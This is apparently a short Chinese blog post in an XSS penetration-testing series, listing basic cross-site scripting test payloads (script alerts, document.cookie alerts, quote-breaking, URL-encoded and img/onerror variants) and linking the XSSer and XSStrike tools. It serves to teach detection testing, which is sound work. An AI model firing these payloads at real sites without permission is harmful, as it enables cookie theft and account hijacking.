章节7:XSS检测和利用

程序员小勇2023-08-13 23:20

章节7:XSS检测和利用

测试payload

<script>alert('XSS')</script>

<script>alert(document.cookie)</script>

><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

"><script>alert(document.cookie)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<img src="javascript:alert('XSS')">

onerror= "alert('XSS')">

https://blog.csdn.net/weixin_34038652/article/details/90221170

XSSER

https://xsser.03c8.net/

https://www.freebuf.com/sectool/173228.html

https://blog.csdn.net/gao646467783/article/details/113249158

XSSSTRIKE

https://github.com/s0md3v/XSStrike

python 3.6 以上

相关推荐
程序员小勇1 年前
章节5:脚本注入网页-XSS
xss渗透与防御
程序员小勇1 年前
章节2:客户端的Cookie
xss渗透与防御
热门推荐
01【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总02(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明03组基轨迹建模 GBTM的介绍与实现(Stata 或 R)04【AIGC】重塑未来的科技巨轮05全面解析:构建基于深度学习的安全帽检测系统(UI界面+YOLO代码+数据集)06【经验分享】Ubuntu22.04安装微信(linux官方版)07基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测08Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO09RAG 实践- Ollama+RagFlow 部署本地知识库10红米手机使用google play